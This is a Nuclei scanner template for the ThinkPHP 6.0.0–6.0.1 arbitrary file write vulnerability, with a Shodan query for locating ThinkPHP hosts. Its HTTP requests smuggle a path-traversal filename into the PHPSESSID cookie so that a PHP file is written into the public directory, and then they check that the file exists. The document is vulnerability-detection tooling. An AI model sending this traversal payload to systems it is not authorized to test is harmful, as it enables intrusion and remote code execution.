44 lines
1.7 KiB
YAML
44 lines
1.7 KiB
YAML
id: thinkphp6-arbitrary-write
|
|
|
|
info:
|
|
name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write
|
|
author: arliya
|
|
severity: critical
|
|
description: |
|
|
ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string
|
|
reference: |
|
|
- https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591
|
|
- https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
|
|
- https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: title:"ThinkPHP"
|
|
tags: thinkphp,file-upload,rce
|
|
|
|
variables:
|
|
random_filename: "{{to_lower(rand_base(11))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: PHPSESSID=/../../../public/{{random_filename}}.php
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
- |
|
|
GET /{{random_filename}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header_1
|
|
words:
|
|
- "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php"
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- "status_2 == 200"
|
|
# digest: 4b0a00483046022100f8d2dcd7ab599a92095428ff31bc7a4a3c09befacc814c2804ca8ff7a0a62635022100d876802d930054655ca2299f666120809dfd8976e6a6c5f4992c3ec715be665a:922c64590222798bb761d5b6d8e72950 |